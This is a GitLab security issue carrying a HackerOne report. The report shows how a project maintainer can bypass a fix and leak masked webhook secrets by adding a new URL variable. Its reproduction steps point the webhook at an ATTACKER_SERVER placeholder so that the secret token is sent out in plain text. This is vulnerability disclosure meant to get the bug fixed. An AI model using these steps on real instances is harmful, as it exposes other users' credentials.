Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1871136 by 0xn3va
on 2023-02-12, assigned to @rshambhuni:
Report | Attachments | How To Reproduce
Report
Summary
There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:
### https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208
### ...
before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }
### ...
def reset_url_variables
self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?
end
However, reset_url_variables
will return false
if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.
Steps to reproduce
As a project owner
- Create a project
- Add another user to the project as a maintainer
- Go to Settings > Webhooks
- Put the URL
https://example.com?token=secret-token
- Click to add a mask
- Add the value
secret-token
with the replacementTOKEN
- Click save for the webhook
As a maintaner
- Open the project
- Go to Settings > Webhooks
- Click edit on the webhook
- Edit the URL to your controlled server like that:
https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
- Add the value
aaaaa
with the replacementA
- Save the webhook
- Now click
Test
to send a request - Check your server logs; it will contain the secret in plain text
Impact
This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.
What is the current bug behavior?
Adding or deleting a new secret does not reset the previously saved ones
What is the expected correct behavior?
Adding or deleting a new secret resets the previously saved ones
Relevant logs and/or screenshots
Screen_Recording_2023-02-12_at_12.55.50.mov
Output of checks
This bug happens on GitLab.com
Impact
This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: